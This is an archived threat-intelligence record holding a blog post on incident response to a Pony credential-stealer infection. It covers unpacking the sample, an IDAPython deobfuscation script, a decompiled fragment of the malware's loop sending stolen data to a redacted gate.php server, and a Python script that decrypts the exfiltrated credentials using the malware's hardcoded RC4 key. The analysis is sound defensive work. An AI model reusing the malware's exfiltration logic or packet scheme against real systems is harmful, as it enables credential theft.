{
	"id": "846b237d-ba81-4328-aa0a-4bbcef649fd9",
	"created_at": "2026-04-06T00:15:35.610278Z",
	"updated_at": "2026-04-10T03:30:33.391194Z",
	"deleted_at": null,
	"sha1_hash": "35cca476848cd456afbf67575d06769d089d070d",
	"title": "Practical Threat Hunting and Incidence Response : A Case of A Pony Malware Infection • Raashid Bhat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 739087,
	"plain_text": "Practical Threat Hunting and Incidence Response : A Case of A\r\nPony Malware Infection • Raashid Bhat\r\nPublished: 2019-07-30 · Archived: 2026-04-05 13:59:37 UTC\r\nJuly 30, 2019\r\nPractical Threat Hunting and Incidence Response : A Case of A Pony Malware\r\nInfection\r\nMost organizations opt for an incidence response , after a catastrophic cyber security event has taken place .\r\nIncidence response and threat hunting focus on events that happen after an endpoint is hit by a cyber attacks ,for\r\nexample a malware infection . One of the main goals of a holistic approach for threat hunting and incidence\r\nresponse is to determine the extent of damages done by the attack and recover as much possible from it .\r\nIn this blog post , I will present a scenario of threat hunting and Incidence response out of a malware infection on\r\nan endpoint .\r\nFirst step in threat hunting is to look for infection markers , and a basic way to figure out a malware infection is to\r\nlook for any suspicious running processes\r\nQuickly we are able to locate a suspicious running process named as\r\nPckntl.exe . This is what most people do next , upload the file to virus total, but often times it does no justice .\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 1 of 9\n\nBy all means , this malware seems to be packed and obfuscated , perhaps why none of the anti virus/endpoint\r\nsystems were able to detect this file with full confidence .\r\nAnd , this is where we will have to get our hands dirty and do the nasty work . We have to do some manual work\r\non this file . As soon as we dig bit deeper , we immediate figure out this is a VB 6 packed file . Decompiling the\r\nfile revels lots of name mangling and obfuscation used.\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 2 of 9\n\nCode behind the VB 6 packer is irrelevant to our analysis , unless you have got lot of free time in your hands .\r\nInstead of banging our heads around this useless code , we will let it run and break in between to get a look at the\r\nreal hidden code behind this packer\r\nAfter running it for a while , we attach debugger and the hidden code is finally revealed\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 3 of 9\n\nThere are lot of strings and functions calls in this code , which probably means that this is the final layer of\r\nunpacked malware and consequently we dump the code to file system\r\nThe obvious next task would be to correctly identify this malicious code . Earlier , we had no luck with VirusTotal\r\n, so this time instead of using virus total , we will use this amazing malware identification platform known as\r\nMalpedia created by Daniel Plohmann. This system is great for maching with Yara rules written by community ,\r\nand it does have a plethora of Yara mules to match against . \r\nAnd Wow! , Malpedia didn’t disappoint us . Impressive system .\r\nImmediately , this great system was able to figure out which malware this belongs to . Malpedia was able to\r\nidentify this samples as Pony trojan .\r\nNow what does this pony malware do ?\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 4 of 9\n\nA pony malware is a credential harvesting malware . we will have to resurrect the forensic investigator in all of\r\nus :P . As its happens to be a credential harvester and the endpoint was infected , most certainly so credentials\r\nwere exfiltrated from network . This is where incidence response comes into play . We will investigate about the\r\nexfiltrated credentials and possibly recover them .\r\nAs we notice the captured PCAP file , it is quite obvious that the exfiltrated data is in someways encrypted\r\nBut before we start feeling lucky , we have got another hurdle in front of us . The malware has control flow\r\nobfuscation in its code . This makes analysis terribly difficult and defeats IDA’s static analysis engine\r\nIt uses stack to align control flow , with some instructions in-between which have no side effects on EIP. In order\r\nto recover from this mess and allow IDA to recognize subroutines with proper stack alignment , we will write an\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 5 of 9\n\nIDAPython script to deobfuscate this bad boy\r\nAntiDisam = 0\r\nDebug = 0\r\ndef WriteMem(addr, buff):\r\n global Debug\r\n if Debug:\r\n DbgWrite(addr, buff)\r\n else:\r\n for i in buff:\r\n PatchByte(addr, ord(i))\r\n addr = addr + 1\r\n return\r\nwhile 1:\r\n blackList = [0x00410621,0x004105C3 ]\r\n AntiDisam = FindBinary(AntiDisam + 1, SEARCH_DOWN, \"55 8B EC 5D 68 ?? ?? ?? ?? F8 72 01\")\r\n print hex(AntiDisam)\r\n if AntiDisam == 0xffffffff:\r\n break\r\n if AntiDisam in blackList:\r\n WriteMem(AntiDisam + 3, \"\\x90\" * 11)\r\n continue\r\n WriteMem(AntiDisam, \"\\x90\" * 14)\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 6 of 9\n\n** Before and after executing script **\r\nWe start analysing from the place it sends exfiltrated data to c2\r\n if ( pstm \u0026\u0026 GeneratePacket(pstm, \u0026Data) == 1 )\r\n {\r\n for ( i = “http://XXXX/gate.php”; *i \u0026\u0026 !v0; ++i )\r\n {\r\n v3 = 2;\r\n while ( 1 )\r\n {\r\n v4 = 0;\r\n if ( SendPacket(i, pstm, (int)\u0026v4) )\r\n {\r\n if ( v4 )\r\n {\r\n v0 = sub_40FB14(v4);\r\n if ( !v0 )\r\n {\r\n if ( sub_401BC0(v4) )\r\n v0 = sub_40FB14(v4);\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 7 of 9\n\n}\r\n }\r\n }\r\nAn abridged version of our analysis would be the following\r\nData is recovered from saved password of many applications ( FTP, EMail, Browser, bitcoin )\r\nHeader and metadata information is appended to packet ( PWD FILE 01 version and magic with length\r\nfields )\r\nThis packet is compressed using APLIB\r\nAnother packet header is appended with header CRYPTED0 magic , subsequently this packet is encrypted\r\nusing RC4 with a hardcoded key\r\nFurthermore , this packet is again encrypted using RC4 , but this time with a randomly generated key ,\r\nappended to the packet at first 4 bytes\r\nIt would be relatively easy to convert this narrative into a python code and decrypt the exfiltrated data from PCAP\r\nfile\r\nimport struct\r\nimport aplib\r\nimport sys\r\ndef main():\r\n ciphertext = open(sys.argv[1], \"rb\").read()\r\n key =ciphertext[0:4]\r\n ciphertext = ciphertext[4:].encode(\"hex\")\r\n decrypted = decrypt(key, ciphertext)\r\n key = \"K!K\"\r\n ciphertext = decrypted[8:].encode(\"hex\")\r\n decrypted = decrypt(key, ciphertext)\r\n open(\"FinalOutput\", \"wb\").write(aplib.decompress(decrypted[0x0c + 4:]))\r\nmain()\r\nPython Decrypt.py Ouput.bin\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 8 of 9\n\nAnd finally we get to see the exfiltrated credentials in plain text . Attackers managed to steal some Email\r\ncredentials and FTP logins\r\n26\r\nKudos\r\n26\r\nKudos\r\nSource: https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection"
	],
	"report_names": [
		"practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434535,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.pdf",
		"text": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.txt",
		"img": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.jpg"
	}
}